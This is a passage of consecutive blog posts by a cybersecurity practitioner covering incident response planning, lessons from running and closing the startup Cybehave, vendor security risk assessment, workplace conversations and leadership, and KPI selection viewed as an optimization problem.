On web servers, installation of web shells should be detected. Web shells can be hard to detect. Because of this, it is a good idea to monitor file integrity of the files on the server, so that a new or changed file would be detected. This can be done using endpoint protection systems.

How can we use these logs to stop attackers?

Detecting attackers will not help you unless you take action. You need to have an incident response plan with relevant playbooks for handling detections. This post is already long enough, but just like the attack, you can look at the incident response plan as a multi-phase activity. The plan should cover: 

  1. Preparations (such as setting up logs and making responsibilities clear)
  2. Detection (how to detect)
  3. Analysis and triage (how to classify detections into incidents, and to trigger a formal response, securing forensic evidence)
  4. Containment (stop the spread, limit the blast radius)
  5. Eradication (remove the infection)
  6. Recovery (recover the systems, test the recovery)
  7. Lessons learned (how to improve response capability for the next attack, who should we share it with)

You want to know how to deal with the data you have collected to decide whether this is a problem or not, and what to do next. Depending on the access you have on endpoints and whether production disturbances during incident response are acceptable, you can automate part of the response. 

The most important takeaway is:

Set up enough sensors to detect attacks early. Plan what to do when attacks are detected, and document it. Perform training exercises on simulated attacks, even if it is only tabletop exercises. This will put you in a much better position to avoid disaster when the bad guys attack! 

Things I learned from starting – and shutting down – a company

In 2016 I worked as a business development manager at Lloyd’s Register‘s consulting unit in Norway. We were building up a new service within industrial cybersecurity, and had a few good people on the team. We had great plans but then difficult times in the oil and gas sector started to cause problems for us. The order books were close to empty and the company started offering severance packages. We lost two key resources for our cybersecurity project, and internal funding for “future growth” was hard to obtain in this economic climate. That was the birth of the company Cybehave.

Starting a company with little sense of direction

We started Cybehave first a development project where we wanted to automate cybersecurity risk assessment, to make such services available to smaller companies. We got seed funding from Innovation Norway – called “markedsavklaringsstøtte” (Norwegian for “market validation grant”), about NOK 85.000. We also got a free workplace for a while at a startup incubator while establishing a “minimum viable product”. A key problem was that we didn’t really know what was a viable product, or who the customers were. We were searching for pilot customers, looking at small and medium sized businesses. All our real-world sales experience, however, was from LR. We were used to working with global energy companies, government agencies and international manufacturing organizations. The contacts we had, and the typical way to initiate conversations in that space, was irrelevant in the SMB space. So we were to a large degree guessing what those SMB’s would need in terms of security, having problems agreeing between ourselves what exactly our value proposition was. While doing this, our laid-off PhD level expert in risk management was building a minimum viable product by coding up a web application in Django/Python.

Without a clear understanding of your market, it hard to know what focus on.

We did focus groups, where we invited companies from many sectors. We got little useful feedback. Vi visited a lot of companies, trying to convince them that they needed cybersecurity risk management and awareness training. They were not particularly interested, and our message was perhaps not very clear either.

Before you invest a lot of time (and money) in your product, know who the customer is, and what problem you are solving for them. If you don’t know, spend time searching for a problem to solve instead of a customer who has the problem you have imagined must be important to others.

Without money, life is hard

Still without customers, we wanted to sell our great approach to human centric cybersecurity. We were thinking that “we don’t have customers because we don’t have money for marketing”. Because of this, we wanted a bring an investor on board. One of the co-founders focused a lot on this, but finding an investor who is interested without customers and cash flow, and without a very clear value proposition was difficult, for some reason. Here’s what we learned:

  • Local angel investors want a lot for equity without contributing much money. They have limited networks and understanding of B2B markets.
  • Pitching in start-up events requires to have a really good story. B2C stories tend to win over B2B stories, at least if your story isn’t particularly exiting
  • Financial estimates have very little value in the early phase. They are mostly baseless guesstimates, sprinkled with wishful thinking.
  • Professional investors give a lot of very useful feedback. Talking to investment funds even if you are not in a place where you would be a good investment. You learn how they think, what they are looking for: clarity of benefit provided, growth potential, intellectual property rights, and capabilities of the management team/founders.

End of story, we did not get any external investment. The story was a bit too vague to compete with B2C for small-scale investors – or for the offers we did get we were too greedy to say “yes” to give away too much ownership, and too early to be interesting to equity funds.

We went to the government again – Innovation Norway. They granted us a “commercialisation grant” of NOK 450.000. We received the first pay-out early 2019, 50% of the grant. That process was not without effort, but with a better story to tell, a better plan, and a working prototype to demonstrate part of we wanted to do was enough to get that money. And it was a nice grant because we did not have to give away equity – although the amount of money was not anywhere close to what we wanted to get sufficient growth. Because of this, and our not so successful attempts at getting investors on board, we switched the strategy of getting funding the old-fashioned way; through positive cash flow.

Because the company was not making money, and we did not have any serious funding in place, nobody was working on the project full-time. We all had day jobs, and demanding day jobs at that. Building up a security team at a global IT company, leading a department at a regional hospital. This further hampered product development.

You need a realistic funding plan from the beginning. Think through what you want from an external investor (money – or network, operational experience, support in addition) and how much of the equity (and control) you are willing to part with.

We did not want to make money by selling consulting hours. We wanted to build a scalable alternative. However, to provide cash flow to the company, we decided to start doing some consulting. However, doing that on top of a day job that had to be followed up, did not leave much time for building those scalable services!

Create a realistic plan for input resources, whether time or money. Full time work on the side of bringing in money for development through consulting is not a sustainable model.

Administration requires work too

It is easy to focus on the customer, the big ideas, developing software (more about that later). if you don’t keep up with administrative needs, there will be problems.

Accounting is important. There are many software companies selling “do-it-yourself” accounting solutions. Unless you enjoy accounting and actually know what you are doing, avoid the DIY solutions. IT is hard to know which account to use for a certain expense, and what services bought outside the country that should be reported for VAT or not. You could spend time learning all this, but unless that is your core business or you enjoy the details of accounting, get help. Top three accounting tips must be:

  • Engage an accountant.
  • Set up integrations between your bank accounts and your accounting system.
  • Use the accounting data to keep track of your company’s finances. Set up dashboards or reports that make sense to you. As a bare minimum you should get monthly statements on cash flow, liquidity and expenses in key categories (e.g. cloud computing, travel, salary).

In addition to accounting you will need to report regularly to the government. In Norway you will have to create a VAT tax report every other month. Failing to report on time will cause trouble – or fines from the tax authorities. This job is definitely best left to an accountant again! The same goes for the annual accounts and shareholder registry if your company is a limited company with shares.

Get an accountant, and set up bank integration solutions and automation as early as you can. This will free up a lot of time and worry so you can focus on building your company.

A successful product: PrivacyBox

In 2018 I worked at Sportradar as my full-time day job. There I met the data protection officer, newly hired, who was trying to get this multinational company in shape for the GDPR. Together we created an internal tool for a personal data inventory solution. We also saw that there were a lot of challenges related to management of requests from data subjects. The most common solution was to publish an e-mail address on the privacy policy page where people could submit requests for access to data, deletion or other rights they want to exercise under the GDPR or other policies. We agreed to take my colleague from Sportradar on as a shareholder in Cybehave and to develop a good solution for handling privacy rights. The counterpart at Sportradar was the head of legal, to avoid conflicts of interest. Sportradar would be a pilot customer, with free access the first months (before the product was actually very usable) as long as we got feedback on the software. Then they would get a discount for some time before the price goes up to the market price.

This gave us a very different situation from the security awareness and risk solution: someone with actual use for the product who could tell us what they needed. It was mainly I who developed the first version of this software, as a prototype. We got a lot of great features in, and the customer was happy with the product. It was in use by Sportradar globally across all their brands from 2019 to 31 December 2021. They had to switch vendor because Cybehave is being dissolved but they were happy with the solution.

  • Have a pilot customer before you write any type of code
  • The pilot customer should have a clear need to satisfy and opinions on how the system should work
  • The pilot customer should have sufficient volume of work to be done in the software that you get real-world experience and feedback

In addition to the help we got from the clear feedback from the pilot customer, we quickly learned a few other things:

  • Create great end-user documentation that tells users how to accomplish tasks.
  • For “one-time users” such as data subjects making requests, make filling in the form as quick and easy as possible
  • Solutions that filter spam are important when publishing forms online on pages with high-volume traffic. An e-mail with a confirmation link is a simple and effective solution for this.
  • Application logging is extremely important for troubleshooting and customer support requests
  • Be prepared to answer customer support requests quickly. Keeping the customer happy means making sure they can get their work done, even when the software solution has a bug or is missing a feature

Work closely with a pilot customer to create a product that actually solves a problem. Remember that documentation, logging and support are essential parts of the service offering!

Don’t develop software alone

Cybehave was a company without full-time employees. In fact, most of the time it did not have any employees at all. In the beginning, the first prototype of a SaaS software was created by the colleague that was let go from LR. She was a brilliant risk analyst, and great at scientific computing. That does not make you a software engineer. The majority, however, was written by me. The other two co-founders were non-technical and did not write code. Not sure I am brilliant at anything, but I am also not a software engineer by education. I did, however, learn a great deal from the Cybehave project, as well as from working at Sportradar. Key take-aways for the next time:

  1. Don’t write software alone. It is too much work and too easy to make serious mistakes leading to vulnerabilities and nasty bugs.
  2. Spend more time thinking about architecture and design patterns than actually writing code.
  3. Iterate. When your new feature works, it is not done. Work on it until it becomes good – think about and measure performance, reliability, user experience. And most of all: get outside feedback on how well it works – it will all be easy to you, since you created it!
  4. Test. Because of the lack of formal software engineering background and a focus on “creating the things” as a one-man show, not much testing was done when writing Cybehave’s software. Testing is extremely important for both performance and security.
  5. Don’t create features the customer does not need. All software will need to be maintained, the less code you have, the less interest there will be to pay on the technical debt.

For PrivacyBox we sometimes needed to improve features or add new ones. At one point, we decided to hire a freelancer to do some improvements. That freelancer was a professional software engineer who was not necessarily cheap per hour, but created high-quality code, improved architecture and provided very helpful feedback on technical details. If your team does not have the competence needed and you cannot afford to hire someone, contract with good freelancers for specific tasks and make sure to work closely with them.

Automation and Git hygiene provide a lot of value

You should not make software development a solo project, and testing is important. If you are a non-technical founder but your company makes software, make sure to talk to your technical team about how to ensure good quality of the software you produce. Even with a small team, or with freelancers on board for specific features, you will gain a lot by setting up automated tests and build pipelines. This will reduce the number of bugs and provide help to build better software.

  • Set up at least three branches in Git: development, test, production
  • Push often to development to make sure you do not lose work
  • Use feature branches that will merge to development
  • Merge to test branch should automatically run important tests. Those should include static analysis and software component analysis as a minimum. You should also have unit tests and integration tests running in a software test suite. If tests fail, you should not be able to merge the branch into production.
  • When you merge to production, your pipeline should automatically push the changes to the production servers. Most likely you will be running your software on public cloud infrastructure. Public cloud providers will typically have good documentation available for how to set up CI/CD pipelines.

Application security bare minimum practices

Nothing will erode your customer’s trust as fast as a compromised software solution. Security is business critical, not only to you but also to your customer. Because of this, you should make sure that the software you create follows some key practices.

  1. Ensure identity and authorization management is properly implemented. Use single sign-on solutions for B2B interactions when possible. If you implement your own authentication and authorization system, make sure passwords are strong enough, hashed and salted, and that multifactor authentication is available and possibly required.
  2. Log all security events and create alerts for unexpected events. Important events include authentication, password change, privilege escalation (if multiple authorization levels exist), user creation, unauthorized access/transaction attempts, all privileged access/transactions. In addition, there may be context specific events that are important to track, such as data deletion, data sharing, etc.
  3. Ensure input validation is applied for all user generated input. This also applies to responses from third-party API’s.
  4. Make sure there are no secrets in your code. Secrets should be injected at run-time and be possible to rotate.

Follow good software engineering practices form the start. If you don’t you will get a lot of technical debt, which means there will be so much maintenance to do that you will never catch up.

Lessons from shutting it down

So, Cybehave came to an end. Closing down a software company, means shutting down a lot of services. It would have been much easier to do this, if we had an inventory of all online services and software solutions we were using. When starting to shut down our operations, we had to create this inventory. Here are some categories of services we were using:

  • Transactional mail providers
  • Cloud services (we were running on Google cloud IaaS and PaaS solutions)
  • Office/collaboration software
  • CRM and marketing solutions
  • Github organization with private and public repositories
  • Accounting software
  • Mobile apps from banks, etc.

Just keeping track of the online accounts and services used in a spreadsheet would be a great help. I noticed that we had accounts with many SaaS providers that we were not using; we had simply tried them out and left the accounts active when abandoning them. With a cloud software inventory and a practice to shut down unused accounts we would not only make it easier to shut down the company, we would also have reduced our attack surface.

Shutting down a company also means reporting this to the authorities. We got good help from our accountant in doing this, which takes way the uncertainty about what is required.

Telling our customers has also been important, of course. This should be done in good time, so the customers can transfer data and systems to new solutions if your products are being discontinued. We see that this requires a bit of support time and extra engineering effort to create good data transfer solutions. Factoring in the time to do this is important so that no bridges are burned and contractual obligations are met.

If you are shutting down your company, set aside enough time for technical shutdowns, mandatory reporting, and most importantly, taking care of your business relationships.

Postludium

Cybehave has been a great journey, and the company was actually profitable most years. Most of the cash flow came from consulting, where we have had the privilege of helping software companies, healthcare authorities, municipalities, construction companies. As much as I enjoy creating software, working directly with customers creating value and improving security is the real motivator. Today I am back in a great company where I can do this every day – with real positive impact.

Talking to fund managers and potential customers that never resulted in investments or sales have also been interesting. Start-up life is full of contrasts, at one point we were sitting in a meeting with top management of a multinational engineering company one day, and meeting a potential customer the next day where all 6 employees shared one office that was filled with cardboard boxes and laptops on the floor. It is rewarding but also tiring. But without sufficient financial muscles, the impact you want to make will remain a dream.

Although leaving a project you have put thousands of hours into will inevitably make you feel a bit melancholic, the future is bright, exiting and fast paced!

Happy new year – cybersecurity is still the main focus for 2022. Working to keep the lights on, hospitals running and supply chains safe from hackers.

My new project is working for DNV Cybersecurity, where we are building the world’s best industrial cybersecurity provider within DNV’s Accelerator. DNV’s purpose is to safeguard life, property and the environment – which is very close to heart for me. DNV Cybersecurity has recently joined forces Applied Risk, and this is only the beginning. I am therefore looking forward to making impact together with great colleagues at DNV, where fast growth will allow us to bring the best security solutions for the real world to more customers around the world, defending hospitals, the power grid, shipping, food supply chains and the energy markets from hackers also in 2022.

Happy new year to all of you!

Vendor Security Management: how to decide if tech is safe (enough) to use

tl;dr: Miessler is right. We need to focus on our own risk exposure, not vendor security questionnaires

If you want to make a cybersecurity expert shiver, utter the words “supply chain vulnerabilities”. Everything we do today, depends on a complex mixture of systems, companies, technologies and individuals. Any part of that chain of interconnected parts can be the dreaded weakest link. If hackers can find that weak link, the whole house of cards comes crumbling down. Managing cyber supply chain risk is challenging, to say the least. 

Most companies that have implemented a vendor cybersecurity risk process, will make decisions based on a questionnaire sent to the vendor during selection. In addition, audit reports for recognized standards such as ISO 27001, or SOC2, may be shared by the company and used to assess the risk. Is this process effective at stopping cyberattacks through third parties? That is at least up for debate.

Daniel Miessler recently wrote a blog post titled It’s time for vendor security 2.0, where he argues that the current approach is not effective, and that we need to change the way we manage vendor risks. Considering how many cybersecurity questionnaires Equifax, British Airways and Codecov must have filled in before being breached, it is not hard to agree with @danielmiessler about this. What he argues in his blog is: 

  1. Cybersecurity reputation service (rating companies, etc) are mostly operating like the mob, and security questions are mostly security theater. None of this will save you from cyber armageddon.
  2. Stay away from companies that seem extremely immature in terms of security
  3. Assume the vendor is breached
  4. Focus more on risk assessment under the assumption that the vendor is breached than questionable questionnaires. Build threat models and mitigation plans, make those risks visible. 

Will Miessler’s security 2.0 improve things?

Let’s pick at the 4 numbered points above one by one. 

Are rating companies mobsters? 

There are many cybersecurity rating companies out there. They take measure of themselves to be the Moody’s or S&P’s of cybersecurity. The way they operate is they pull in “open source information about cybersecurity posture” of companies. They also say that they enrich this information with other data that only they have access to (that is, they buy data from marketing information brokers and perform data exchange with insurance companies). Then they correlate this information in more or less sound statistical ways (combined with a good dose of something called expert judgment – or guessing, as we can also call it) with known data breaches and create a security score. Then they claim that using companies with a bad score is dangerous, and with a good score is much better. 

This is definitely not an exact science, but it does seem reasonable to assume that companies that show a lot of poor practice such as a lack of patching, botnet infected computers pinging out to sinkholes and so on, have worse security management than similar companies that do not have these indicators. Personally, I think a service like this can help sort the terrible ones from the reasonably OK ones. 

Then, are they acting as mobsters? Are they telling you “we know about all these vulnerabilities, if you don’t pay us we will tell your customers?”. Not exactly. They are telling everyone willing to pay for access to their data these things, but they are not telling you about it, unless pay them. It is not exactly in line with accepted standards of “responsible disclosure”. At the same time, their findings are often quite basic and anyone bothering to look could find the same things (such as support for old ciphers on TLS or web servers leaking use of an old PHP version). Bottom line, I think their business model is acceptable and that the service can provide efficiency gains for a risk assessment process. I agree with Miessler that trusting this to be a linear scale of cyber goodness is naive at best, but I do think companies with a very poor security rating would be more risky to use than those with good ratings. 

mobster planning his next security rating extortion of SaaS cybersecurity vendors
Some security vendors have a business model that resemble extortion rackets of a 1930’s mobster. But even mobsters can be useful at times.

Verdict – usefulness: rating services can provide a welcome substitute or addition for slower ways of assessing security posture. An added benefit is the ability to see how things develop over time. Small changes are likely to be of little significance, but a steady improvement of security rating over time is a good sign. These services can be quite costly, so it is worth thinking about how much money you want to throw at it. 

Verdict – are they mobsters? They are not mobsters but they are also not your best friends. 

Are security questionnaires just security theater? 

According to Miessler, you should slim down your security questionnaires to two questions: 

  1. “when was the last time you were breached (what happened, why, and how did you adjust)”?, 
  2. and “do you have security leadership and a security program?”.

The purpose of these questions is to judge if they have a reasonable approach to security. It is easy for people to lie on detailed but generic security forms, and they provide little value. To discover if a company is a metaphorical “axe murderer” the two questions above are enough, argues Miessler. He may have a point. Take for example a typical security questionnaire favorite: “does your company use firewalls to safeguard computers from online attacks?” Everyone will answer “yes”. Does that change our knowledge about their likelihood of being hacked? Not one bit. 

Of course, lying on a short questionnaire with Miessler’s 2 questions is not more difficult than lying on a long and detailed questionnaire. Most companies would not admit anything on a questionnaire like this, that is not already publicly known. It is like flying to the US a few years ago where they made you fill out an immigration questionnaire with questions like “are you a terrorist?” and “have you been a guard at a Nazi concentration camp during WWII”. It is thus a good question if we can even just scrap the whole questionnaire. If the vendor you are considering is a software firm, at least if it is a “Software as a Service” or another type of cloud service provider, they are likely to have some generic information about security on their web page. Looking up that will usually be just as informative as any answer to the question above. 

Verdict: Security questionnaires are mostly useless – here I agree with Miessler. I think you can even drop the minimalist axe murderer detection variant, as people who lie on long forms probably lie on short forms too. Perhaps a good middle ground is to first check the website of the vendor for a reasonable security program description, and if you don’t see anything, then you can ask the two questions above as a substitute. 

Stay away from extremely bad practice

Staying away from companies with extremely bad practice is a good idea. Sometimes this is hard to do because business needs a certain service, and all potential providers are horrible at security. But if you have a choice between someone with obviously terrible security habits and someone with a less worrying security posture, this is clearly good advice. Good ways to check for red flags include: 

  • Create a user account and check password policies, reset, etc. Many companies allow you to create free trial accounts, which is good for evaluating security practices as well. 
  • Check if the applications are using outdated practices, poor configuration etc. 
  • Run sslscan to check if they are vulnerable to very old crypto vulnerabilities. This is a good indicator that patching isn’t exactly a priority.

Verdict: obviously a good idea.

Assume the vendor is breached and create a risk assessment

This turns to focus on your own assets and risk exposure. Assuming the vendor is breached is obviously a realistic start. Focusing on how that affects the business and what you can do about it, makes the vendor risk assessment about business risk, instead of technical details that feel irrelevant. 

Miessler recommends: 

  • Understand how the external service integrates into the business
  • Figure out what can go wrong
  • Decide what you can do to mitigate that risk

This is actionable and practical. The first part here is very important, and to a large degree determines how much effort it is worth putting into the vendor assessment. If the vendor will be used for a very limited purpose that does not involve critical data or systems, a breach would probably not have any severe consequences. That seems acceptable without doing much about it. 

On the other hand, what if the vendor is a customer relationship management provider (CRM), that will integrate with your company’s e-commerce solution, payment portal, online banking and accounting systems? A breach of that system could obviously have severe consequences for the company in terms of cost, reputation and legal liabilities. In such a case, modeling what could happen, how one can reduce the risk and assessing whether the residual risk is acceptable would be the next steps.

Shared responsibility – not only in the cloud

Cloud providers talk a lot about the shared responsibility model (AWS version). The responsibility for security of software and data in the cloud is shared between the cloud provider and the cloud customer. They have documentation on what they will take care of, as well as what you as a customer need to secure yourself. For the work that is your responsibility, the cloud provider will typically give you lots of advice on good practices. This is a reasonable model for managing security across organizational interfaces – and one we should adopt with other business relationships too. 

The most mature software vendors will already work like this, they have descriptions of their own security practices that you can read. They also have advice on how you should set up integrations to stay secure. The less mature ones will lack both the transparency and the guidance. 

This does not necessarily mean you should stay away from them (unless they are very bad or using them would increase the risk in unacceptable ways). It means you should work with them to find good risk mitigations across organizational interfaces. Some of the work has to be done by them, some by you. Bringing the shared responsibility for security into contracts across your entire value chain will help grow security maturity in the market as a whole, and benefit everyone. 

Questionnaires are mostly useless – but transparency and shared responsibility is not. 

In Miessler’s vendor security 2.0 post there is a question about what vendor security 3.0 will look like. I think that is when we have transparency and shared responsibility established across our entire value chain. Reaching this cybersecurity Nirvana of resilience will be a long journey – but every journey starts with a first step. That first step is to turn the focus on how you integrate with vendors and how you manage the risk of this integration – and that is a step we can take today. 

How conversations help us grow

We don’t develop alone. As a colleague, and as a leader, there are many ways you can contribute to the growth of others. I would like to share some thoughts on how to create an environment where professionals can thrive, together.

Think now for a moment that you have a one-to-one conversation with one of your team members. You ask the person; “can you describe a situation where you feel you performed really well at work?”. Perhaps there is no answer, so you will need to follow up with a few nudges. For example, you say that you perform best when you have a clear goal, and you know why you have this goal. Then you may ask – do you feel the same? They are probably going to agree that this sounds quite good. This could be a conversation starter about what the ideal state of work is – when do we get to be the best versions of ourselves at work?

Conversations are important to people
Humans interact through language. Good conversations at work are essential for fostering growth.

Here’s a list of some plausible factors that people could come up with:

  • We have a clear vision of what we are trying to achieve, together
  • There is room for my opinions to be heard and valued
  • I can use my competence and personal strengths to drive results that are valued by others
  • The work itself is interesting and challenges me to learn
  • We have the necessary time and resources to build fundamental knowledge and skills
  • I get clear feedback and support from my manager
  • We all make an effort to contribute to the success of others
  • Our team enjoys good work-life balance
  • We have realistic career development opportunities (vertical and horizontal)
  • Ambition is welcome

Your list may look different, but variations around purpose, autonomy and community are typically ingredients of most people’s ideal working environment. Caring about what that means for each individual, is the essence of professional empathy. If your job as a leader is to facilitate results through others, how can you do that?  

Humans are good at spotting flaws. Engineers and analysts are perhaps the most skilled of all at this. This is why it is so easy for us to start with a problem when we want to achieve improvement. I think it is better to start by focusing on personal strengths. If you perform work every day where you feel you are not developing, or that your competence is not needed for the type of work being done, it is no wonder if you feel disengaged after a while. The best way to find out if someone’s strengths are matching the work they do, is to ask them. Have a conversation about strengths, and how to best use those strengths in the work we do, as a starting point. That is a much more positive tone and helps build a sense of having value in the work community, as opposed to the more typical approach of focusing on a GAP assessment of a skills matrix.

Professional development is key to the motivation of any professional. Without it, engagement dies. If the organization has no training budget and going to conferences is riddled with bureaucracy and layers upon layers of approval requests, this is likely to hurt employee retention more than factors such as low compensation or a high workload. Training is valuable to each individual, but of course it brings benefits to the organization too. We all know this. Don’t accept a situation where people cannot get training. It is not fair to the employee, and it is not sustainable for the company.

Learning is not only done in trainings. We should aim to learn every day, as individuals, and as organizations. A lot of people have never thought about all the opportunities to learn that exist as part of the work they do every day. As a manager you can improve the effect of learning from doing the work by making it more explicit. For example, during investigation of a particular security incident, analysts learn about new TTP’s, as well as how to detect and stop them. Or, when creating a new policy, discussing with stakeholders and collecting feedback is a great opportunity to learn about the perspectives of different stakeholders. Common to both cases is that this learning is very often wasted. It remains in short-term memory only and can often only be retrieved again by relearning it the next time a need for this knowledge exists. This is why we need to be explicit about expectations to learn on the job.

Everyone should have some time every week to reflect on what has been learned, and what it means for them in the future, as well as for the team and organization as a whole. If we set aside a fixed number of hours for “skills development”, encouraging employees to spend some of that time reflecting on what they have learned on the job over the last week, is an example of good management. Don’t mandate how people reflect or document what they have learned but sharing ideas on how to do it is a good idea. Some like to write a work journal. Some prefer blogging, some would rather create proof of concept code. Most people have never thought about doing this, or what they prefer, so encourage experimentation.

Some things that people learn on the job are mostly improving individual competencies. But some things are worth sharing, and it is good to challenge existing practices when they are suboptimal. This is how we move forward. Those practices can be policies and guidelines, they can be habits, or they can be ways of using technology. Encourage sharing where sharing is due. Encourage challenging the status quo and improving the way things are done. Continuous improvement is not a result of a management standard or policy, it is the result of culture. We need to make it happen. As a leader you should visibly share knowledge, visibly challenge practices, and encourage others to do so too. When people see that you are doing it, and not only talking about it, the message becomes much more powerful. A good place to start inviting such contributions is to take a page from lean management and ask: “what is something we spend time on today that we could stop doing without any harm to the organization or our department?”

Of course, our hypothetical bullet point list of a great working environment that will help us perform at our best, is not only about learning and training. Another important aspect here is relationships at work. This is what we can think of as “work community”. A leader is a catalyst for work community; not necessarily the driver of it but the leader helps the organization choose healthy pathways to build community. From our bullet points, the desire to have room to be have opinions heard and valued, packs a lot in one sentence. What has to be in place for us to have such a situation? We definitely need a certain level of psychological safety, so that people don’t feel threatened of ridicule or being ignored when they raise their voice. We can achieve a sense of psychological safety when we can trust that our surroundings have our best interest in mind. The people we surround us with want us to succeed. At the same time, we must accept disagreement and honesty. We should not expect any idea to be accepted at face value, we should expect, even demand, that every idea is challenged. But it should be challenged constructively, respectfully, and without any implication of us thinking less of the person bringing the idea to the table. Bringing a bad idea to the table is infinitely better than not bringing any ideas to the table. A culture of silence is the place where creativity goes to die. So, what can you do to foster this ideal state where people love to contribute and really feel that their contributions mean something to the department, and to the organization?

One thing you can do to instill trust, is to be vulnerable. Put yourself at risk by sharing your ideas with your team and ask them for feedback. Not the type of feedback often given to managers, such as “OK” or “looks good to me”. Ask for concrete feedback on “what do you like about this suggestion?”, “what do you dislike about it?”, “why do you think so?”, “how can we improve it?”. Let people see that you don’t have all the answers. If the case you are trying to improve is difficult, let people know you think it is difficult. Taking away the notion that you have to know everything is helpful for reducing imposter syndrome.

Empathy is key to trust. We cannot expect to have the same kind or relationship with everyone on the team, or to reduce relationship management to a bullet point list, but we can seek to have valuable and trusting relationships with everyone on the team. To build healthy relationships that foster trust, investing time in working together and in having conversations about both work and life itself, is time well spent. Listen actively in conversations, and care about the ambitions and wants of the other person, as well as the organization. Active listening is a skill worth practicing every day.

Another thing you can do is to think about how you balance relationships versus results.

What have you done lately to support the personal ambitions and career plans of your team members? For example, if one of your the team members has a personal dream of publishing a novel, how would you think about that in terms of your manager-employee relationship? Is it irrelevant to work, should you discourage such ambitious personal plans due to fear of their thoughts being spent on non-work-related projects, or should you support it and help them balance those ambitions with responsibilities and ambitions at work? I know what I think is the best choice, but your view may be different. It is worth thinking about.

And that brings me to the end of this post, thinking. Leadership is difficult. People are complex, and there are so many things that influence how we behave and think. This is why leaders also need support structures. You will have doubts, and you will have seemingly intractable judgments to make. Having a mentor is helpful, someone who can empathize with you as a leader, someone who knows to ask good questions and help you reason. Supporting each other in the leadership team is essential; share your management practices, your doubts, and how that difficult conversation went (while respecting the privacy of your team members, as appropriate). If you want to develop as a leader, I highly recommend finding a good mentor. Good mentors elevate your thinking.

A letter to the manager

This is a letter to all managers out there. If you are being paid to manage other people, this one is for you.

Leadership is like baking. It has a lot of ingredients and care means more than measurements.

I bet there is friction in your team. There is friction in all teams, and some of it is healthy. But when it turns into a chronic condition, relentless, abrasive, never taking a break – then you have a problem. And it may very well be that you and your organization is at fault for creating this unhealthy and unproductive environment. For many workers, work no longer feel inspiring and rewarding. Instead, colleagues feel tired, and many feel disengaged at work. This is a big problem. Disengagement is the arch enemy of excellence. And we would all like to be considered centers of excellence, wouldn’t we?

Perhaps there is a narrow focus on performance management through reporting and key performance indicators. This approach resonates well with most engineers and accountants; what is measured gets managed. There is no doubt that we need to measure performance. How else would we know if we are moving in the right direction? And perhaps that is the core of the disengagement problem. Because who knows what future state are we trying to move towards? If there is a lack of a shared and compelling vision, it is hard for people to know what matters, and what is just noise.

Performance management is a double-edged sword. It has downsides that managers need to be aware of and watch closely to avoid the negative effects of management to overtake the good effects. A very high focus on key performance indicators tend to bring out some side effects such as a lack of involvement, tunnel vision and can also exacerbate short-termism. All of this together tends to create disengagement, which again would drive the real key performance indicators in the wrong direction. Successful managers know how to balance focus on results and relationships. Managing based on measurements alone will tip the balance of focus heavily towards results over relationships, but without healthy relationships we cannot reliably drive results over time.

Let us first consider how measurements can help us drive result in a complex system such as a big organization, and then return to how we tie achievement to key management practices.

About measurements

Measurements are critical. But how do we know if what we measure, and the results we infer from our KPI’s, indicate progress? Managing an organization is an optimization problem. To know whether we succeed or not, we need to know what we are aiming for. In mathematical optimization this is called the objective function – a mathematical function that we seek to minimize, typically under a set of constraints. In management, we typically rely on a vision statement to guide our actions. The KPI’s we live and manage by, should have a clear connection to that vision. Without this connection, it is hard to tell whether a change in the KPI is good or bad, or if such a change is important, or merely a weak improvement of the whole system. To make these connections, we need to apply systems thinking. Systems thinking means an approach where we look at the internal and external interactions of a system and try to understand how our actions push this system from one state to another. Is that new state taking us closer to our desired state, as described in our vision?

Let us go back to our mathematical optimization problem as an analogy of what we are trying to do. Let’s say we have a mathematical model describing “the system”. This model describes the interactions internally in the system, as well as how the system responds to external events that we have no control over, and actions we take on purpose to drive our systems towards that optimal state, where an objective function is minimized. This is a very difficult problem; how can we make the best decisions about inputs we can control (let’s call them u), to optimize the state of a system when there is considerable uncertainty (let’s call such signals that we cannot control d).

In most cases we are also not able to observe every state of the system. There are features of our complex system we cannot see. In some cases, we may infer what they are, but very often we have limited observability of the internal state. This is also true of organizations and management; there will always be internal factors we have no way of observing.

When we make decisions about what to do next, we need to rely on things we can see. These are measurement variables, y. This information can be used to drive our system towards our ideal state, but all information is not equally important. Sometimes two different measurements can also give us in essence the same information. Mathematically speaking we say that the measurements are highly correlated. This means that for solving our mathematical optimization problem, it is not arbitrary which measurement variables we use to drive our decisions. We should carefully select measurements that give us the best ability to approach our optimal state or minimizing our objective function. This is the same for management of an organization; we should pick the KPI’s that will help us the most in moving in the direction of our vision.

The actions we take can be viewed as inputs to our system, whether they are variables in a mathematical optimization problem, or actions and tasks to focus on in an organization. Say we have decided some key performance indicators we would like to drive to some target values. We need to choose our actions for doing this. We will typically have many candidates for actions to take, but not all of them are equally effective. We have two decision problems to solve; which knob should I turn, and what value should I set it to? We also have another issue to keep in mind. While turning a certain knob may drive a property of our system in the desired direction as measured by one specific KPI, what if it makes the situation worse as measured by another KPI? Our optimization problem is much more difficult to solve if there is significant interaction between the internal states we change through our inputs. We should thus aim to decouple the input-output structure of our system. We would like to use inputs (actions) that do not cause conflicting outcomes as measured by different outputs (i.e., our KPI’s). This is not always possible, but we should be aware of the possibility of conflicting interactions and strive for more decoupling in the measurements we use.

So, if we now can agree that it is important to carefully select KPI’s, do we have any heuristics or rules that can help us do that? Luckily, we do. This has been extensively studied both from a mathematical point of view, and from a management theory point of view. It is a good thing that the general conclusions from different research areas do align well with each other.

  • Select KPI’s that are tightly coupled to the objective function so that a change in the KPI would indicate a change in the closeness to our ideal state
  • Select KPI’s that have optimums that are close to invariant under noise and disturbances. This means that if we have small errors in the measurement of our KPI, or external conditions change slightly, we are still operating close to the ideal point of operation.
  • Select KPI’s that are not strongly correlated with each other as they would not together provide more information about the internal state of the system than one alone would
  • Do not select more KPI’s than you have inputs to manipulate. This is because we cannot independently change more outputs, than we have inputs available.

If we pull this knowledge into the context of managing an organization, we can make some immediate observations. First, it will be very hard to select good KPI’s unless we know where we are heading. We need a clear vision for the organization. This is our objective function. Let us try to define a few possible “visions” to see how they would affect our KPI selection problem.

  1. Our vision is to make the CTO happy with the technology department
  2. Our vision is to enable the organization to provide services our customers love
  3. Our vision is to replace all humans in the company with robots maintained by others

These examples are of course contrived but they are made to illustrate that what we want to achieve will heavily influence what we measure, and how we work towards that ideal state. Let us take the first suggestion – our vision is to make the CTO happy with the technology department. Perhaps the deeper motivation for such a vision could be to secure bonuses for ourselves and our friends, or because we are uncertain about management’s ability to see value in what we do so we would like to keep the CTO happy for the sake of our own job security. Of course, none of these are admirable motives but let us pretend this is the case for a moment and see how we would seek to optimize that problem.

